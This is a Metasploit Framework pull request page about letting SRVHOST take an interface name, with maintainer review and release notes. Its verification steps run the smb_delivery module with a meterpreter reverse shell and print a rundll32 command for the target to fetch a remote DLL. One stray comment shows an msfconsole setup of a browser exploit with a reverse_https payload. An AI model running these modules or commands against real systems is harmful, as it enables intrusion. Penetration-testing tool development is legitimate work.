
Use OptAddressLocal for SRVHOST to specify by interface name instead of IP #13405

Merged (3 commits), May 13, 2020

Conversation


@cnotin cnotin commented May 6, 2020

Thanks to #8336 we can now specify LHOST by interface name instead of IP which is really nice.
I got this habit and now I want to apply it to SRVHOST too :)

Verification

  • Start msfconsole -x "use windows/smb/smb_delivery; set srvhost eth0; set payload windows/meterpreter/reverse_tcp; set lhost eth0; run"
  • Verify that you have (adapt for your eth0 IP):
      [*] Started service listener on 192.168.42.100:445
  • Verify that you have:
      [*] Run the following command on the target machine:
      rundll32.exe \\192.168.42.100\fyBWzD\test.dll,0
  • Verify that there is no "eth0" mentioned in the output

TODO:

  • Document (any idea where?)
  • Globalize to other modules which use "SRVHOST"

I will gladly do these remaining tasks if you like this PR :)
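The step the verification above exercises is the resolution of an interface name to an address before the listener starts, so the banner carries an IP and never the string "eth0". The following Ruby sketch is an added illustration of that idea and is not the framework's own OptAddressLocal implementation: the helper names, the interface-table shape and the DEMO_INTERFACES fixture are assumptions, and the real lookup falls back to Ruby's Socket.getifaddrs only when no table is supplied.

```ruby
require 'socket'
require 'ipaddr'

# Enumerate this host's IPv4 interfaces as [name, address] pairs using
# Ruby's Socket.getifaddrs. Entries without an address (e.g. AF_PACKET
# entries on Linux) are skipped.
def local_interface_table
  Socket.getifaddrs
        .select { |ifa| ifa.addr && ifa.addr.ipv4? }
        .map { |ifa| [ifa.name, ifa.addr.ip_address] }
end

# Accept either an IP literal (IPv4 or IPv6, including 0.0.0.0) or an
# interface name. A literal passes through unchanged; a name is looked up
# in the interface table. Anything else is rejected rather than bound.
def resolve_local_address(value, interfaces: nil)
  begin
    return IPAddr.new(value).to_s
  rescue IPAddr::InvalidAddressError
    # Not a literal: fall through to the interface lookup below.
  end
  table = interfaces || local_interface_table
  name, addr = table.find { |n, _| n == value }
  raise ArgumentError, "#{value} is neither an IP address nor a local interface" unless name
  addr
end

# Build the listener line the verification step looks for. The resolved
# address is what appears here, never the interface name the user typed.
def listener_banner(srvhost, srvport, interfaces: nil)
  addr = resolve_local_address(srvhost, interfaces: interfaces)
  "[*] Started service listener on #{addr}:#{srvport}"
end

# Constructed fixture (assumption) so the demonstration does not depend on
# the host actually having an interface called eth0.
DEMO_INTERFACES = [['lo', '127.0.0.1'], ['eth0', '192.168.42.100']].freeze

if __FILE__ == $PROGRAM_NAME
  puts listener_banner('eth0', 445, interfaces: DEMO_INTERFACES)
  puts listener_banner('0.0.0.0', 445, interfaces: DEMO_INTERFACES)
end
```

Binding to the resolved interface address rather than to 0.0.0.0 also narrows exposure: the listener is reachable only from the network that interface sits on, which is the reason to prefer a specific SRVHOST over the every-address default when the host is multi-homed.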

@smcintyre-r7 (Contributor)

I was slightly worried that this might prevent users from opening listening sockets via sessions but after some preliminary testing, that does not look like it is the case.


wvu commented May 7, 2020

This looks like a good change!

Kynepups commented May 13, 2020

msf exploit(ms13_069_caret) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms13_069_caret) > set URIPATH /
URIPATH => /
# Next, let's select the meterpreter reverse_https payload for windows.
msf exploit(ms13_069_caret) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(ms13_069_caret) > show options

Module options (exploit/windows/browser/ms13_069_caret):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The local listener hostname
   LPORT     443              yes       The local listener port

Exploit target:

   Id  Name
   --  ----
   0   IE 8 on Windows XP SP3

msf exploit(ms13_069_caret) >


cnotin commented May 13, 2020

@Kynepups I think you didn't paste the correct thing or you're in the wrong issue 😉

@wvu wvu self-assigned this May 13, 2020

wvu commented May 13, 2020

#10094


wvu commented May 13, 2020

Thanks for doing this, actually. The option hasn't seen much use since its inception (I think it was actually created for Pro). This addresses the primary use case in Framework.


wvu commented May 13, 2020

Correct. See prior comment.


wvu commented May 13, 2020

I'm linking issues for posterity.


cnotin commented May 13, 2020

(yes sorry I was too fast, deleted mine)
It's a very handy feature!


wvu commented May 13, 2020

I'm kind of amazed this didn't happen sooner, but I think we were trying to avoid regressions in a new feature. That was years ago by now. So this is a good upgrade.


cnotin commented May 13, 2020

Yes preventing regressions is the main concern... I guess we'll see? :)


wvu commented May 13, 2020

As for your to-dos, I think we can tweak the description a bit, and it should be "globalized" enough, since it's in SocketServer.

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>
Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

wvu commented May 13, 2020

Cool, will wait for build to pass and then merge. I'll work on your other PRs in the meantime. :)

wvu added a commit that referenced this pull request May 13, 2020

wvu commented May 13, 2020

Release Notes

This converts the SRVHOST option from type OptAddress to OptAddressLocal, allowing a user to specify a network interface for Metasploit servers to listen on.

@wvu wvu merged commit 6034f48 into rapid7:master May 13, 2020
@cnotin cnotin deleted the patch-2 branch May 13, 2020 17:39
Kynepups commented May 13, 2020 via email


cnotin commented May 13, 2020

@Kynepups if you have an issue to report, I suggest creating a separate issue on https://github.com/rapid7/metasploit-framework/issues and providing more information as suggested. Your previous messages aren't very explicit...

@tperry-r7 tperry-r7 added the rn-enhancement release notes enhancement label May 15, 2020
Kynepups commented May 17, 2020 via email

Labels: enhancement, library, rn-enhancement (release notes enhancement), usability (Usability improvements)